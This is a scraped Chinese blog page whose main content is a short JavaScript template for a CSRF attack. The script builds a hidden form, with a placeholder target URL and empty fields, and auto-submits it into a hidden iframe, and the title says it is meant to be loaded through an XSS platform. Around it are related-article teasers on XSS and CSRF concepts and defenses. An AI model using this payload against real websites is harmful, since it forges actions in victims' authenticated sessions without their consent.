CSRF利用js后台加载(可直接放在xss平台上使用)

最新推荐文章于 2022-02-11 23:13:59 发布
最新推荐文章于 2022-02-11 23:13:59 发布
阅读量400 收藏
点赞数
分类专栏: CSRF 文章标签: CSRF JS XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40190341/article/details/100191723
版权 
// 构造form表单
var frm = document.createElement('form');
frm.action = 'url';
frm.method = 'post';
frm.target = 'iframe';
//设置参数
var i1 = document.createElement('input');
i1.name = '';
i1.value = '';
// 把input放到表单里
frm.appendChild(i1);
// 新建 框架,让表单去框架里跳转 iframe
var ifr = document.createElement('iframe');
ifr.name = 'iframe';
// 把表单添加到head里 隐藏
document.head.appendChild(frm);
document.head.appendChild(ifr);
frm.submit();
单纯的小和尚
关注
专栏目录
JS安全问题之XSRF(CSRF)
qq_25503949的博客
07-21 881
JS安全问题之XSRF(CSRF) 一.什么是CSRF: img标签可以直接跨域传递用户信息 二.如何预防: 为啥使用post接口:因为,使用post接口,进行跨域请求很困难,简单地用img标签肯定实现不了,因为需要后端的配合。 三.面试题 XSSCSRF的区别: xss:跨站点攻击。xss攻击的主要目的是想办法获取目标攻击网站的cookie,因为有了cookie相当于有了session,有了这些信息就可以在任意能接进互联网的PC登陆该网站,并以其他人的身份登陆做破坏。预防措施防止下发界面显示htm
[Web安全] xss&CSRF漏洞初探
qq_42551635的博客
09-06 782
[Web安全] xss&CSRF漏洞初探 正文|xss简介 现代网站往往会包含大量的动态内容,动态内容是指web应用程序根据用户环境和需要来输出相关内容。跨站脚本攻击(cross site scripting)是一种针对网站应用程序的安全漏洞利用技术,是代码注入漏洞的一种,它使得攻击者可以通过巧妙地方法向网页中注入恶意代码,用户浏览器在加载网页、渲染html文档时就会执行攻击者的恶意代码,攻击成功后,攻击者可能得到很高的权限,获取私密网页内容、会话、cookie等敏感信息。XSS可以理解为在用户
csrf校验插件-js
05-03
使用该插件可以在使用js向后端提交数据时进行csrf校验
解决 django js 403 crsftoken
Alvin__Yang的博客
09-03 605
$(document).ajaxSend(function(event, xhr, settings) { function getCookie(name) { var cookieValue = null; if (document.cookie && document.cookie != '') { var cookies = d
web攻击之二:CSRF跨站域请求伪造
weixin_30599769的博客
10-21 1473
CSRF是什么? (Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用...
JS小知识点-XSS,CSRF
weixin_44990056的博客
08-20 175
跨站脚本攻击(Cross Site Scripting),缩写为CSS 但容易和样式css缩写混淆,所以改为XSS XSS 通过利用网页开发时留下的漏洞, 注入恶意指令代码到网页, 使用加载并执行攻击者恶意制造的网页程序。 这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。 攻击成功后,攻击者可能得...
ctf xss利用_图片xss利用方法
weixin_28881575的博客
02-23 849
使用类似ueditor这样的网页编辑器时,由于编辑器本身支持的源码编辑功能,如果过滤的不够完善,攻击者可以通过写入js来执行脚本语句,达成存储型xss的效果。当然,如今的编辑器安全方面做的都已经相当不错,能够自动触发的恶意脚本已经是很难写入了,剩下还比较容易受控的,就是点击触发的外部链接了。前段时间,我就在尝试利用了外部链接进行csrf时,小伙伴提醒我可以尝试一下图片xss的方法,该方法和恶意外...
XSSCSRF详解
Sylon的博客
06-24 2822
XSSCSRF详解 随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显。 黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则...
同源政策/跨域与跨域解决策略/web安全攻击CSRF以及XSS
darabiuz的博客
02-11 3208
1.同源策略 1. 什么是同源 同源策略是浏览器安全的基石,当前网页的url和ajax请求地址的url必须同源,它要求协议、域名、端口号三者必须相同,只要有一处不同就属于跨域 2. 为什么要有同源策略 想象这样一个场景,你登录并信任了一个购物网站A,然后在没有退出的情况下登陆了恶意网站B,由于浏览器携带了cookie信息,那么B就可以冒充用户向A网站发送请求,比如购买物品之类的违背用户预期的恶意行为,带来严重影响,这其实也就是平时所说的CSRF攻击(具体见下文对于CSRF的介绍),由来同源策略以后,主要限制
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5633
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
js提交csrf代码
douyunqian668的博客
09-25 1107
var token=$.cookie("csrftoken"); $.ajaxSetup({ beforeSend:function (xhr,settings) { if(!this.crossDomain && !csrfSafeMethod(settings.type)){ cons...
重温什么是CSRF?及js中相应的使用
carcarrot的博客
07-12 260
转自https://blog.csdn.net/sunstar8921/article/details/81974071 《[ValidateAntiForgeryToken] 的作用及用法》 另一个值得注意的典型安全问题还有“跨站脚本攻击XSS” 一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么? 你这可以这么理解C
CSRF攻击与防御
我的知识库
05-07 196
转载地址:http://www.phpddt.com/reprint/csrf.html CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,...
Crawler:关于爬虫的简介、安装、使用方法之详细攻略
近期请国内外头部出版社可尽快私信博主!——心比天高,仗剑走天涯,保持热爱,奔赴向梦想!低调,谦虚,自律,反思,成长,还算是比较正能量的博主,公益免费传播……内心特别想在AI界做出一些可以推进历史进程影响力的东西(兴趣使然,有点小情怀,也有点使命感呀)…
04-12 1万+
Crawler:关于爬虫的简介、安装、使用方法之详细攻略 目录 爬虫简介 爬虫过程思路 关于Python实现爬虫的一些包 1、requests 2、beautifulsoup 3、scrapy 关于爬虫常用的方法函数 1、基本函数 爬虫简介 1、在爬取一些简单的(没有反爬机制的)静态网页时,一般采取的策略是:选中目标(所谓的url链接),观察结构(链接...
人工智能(crawler)—— 爬虫综合
热门推荐
迷途无归的博客
08-13 2万+
目录 内容简介 第一章 爬虫简介 1.1 什么是网络爬虫 1.1.1 爬虫的简单定义     1.1.2 爬虫的分类 1.2 为什么需要爬虫 1.2.1 爬虫的用途 1.2.2怎么做爬虫 第二章 爬虫的基本常识 2.1 爬虫的合法性问题 2.2 爬虫的准备工作:网站的背景调研 2.2.1 robots协议 2.2.2 网站地图sitemap 2.2.3 估算网站的大小 ...
OWASP(CsrfGuard)源码解析06----csrfguard.js分析
一直打铁
01-18 495
csrfguard.js分析一、介绍二、csrfguard.js分析三、小结 一、介绍 csrfguard.js 是 需要 在页面请求之后,执行里面的具体逻辑,通过对 ajax 或者 form 表单 进行 处理. ajax 是在 请求的头部 信息里面添加 form 表单是通过对 页面添加一个 hidden 存储对应的Token value. 二、csrfguard.js分析 下面看一下 csrfguard.js 内容 (function() { /** * Code to ensure our e
csrf技巧
Js_123456789的博客
01-08 91
Burpsuite,在数据包处右键,Engagement tools – Generate CSRF PoC,可生成csrf payload 转载于:https://www.cnblogs.com/huim/p/8244005.html
Web前端安全:XSSCSRF深度剖析
此话题涵盖了多个子主题,包括XSS(跨站脚本)漏洞挖掘与利用CSRF(跨站请求伪造)、对域和同源策略的理解,以及Content Security Policy(内容安全策略)等。 1. XSS漏洞挖掘与利用XSS攻击是一种常见的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值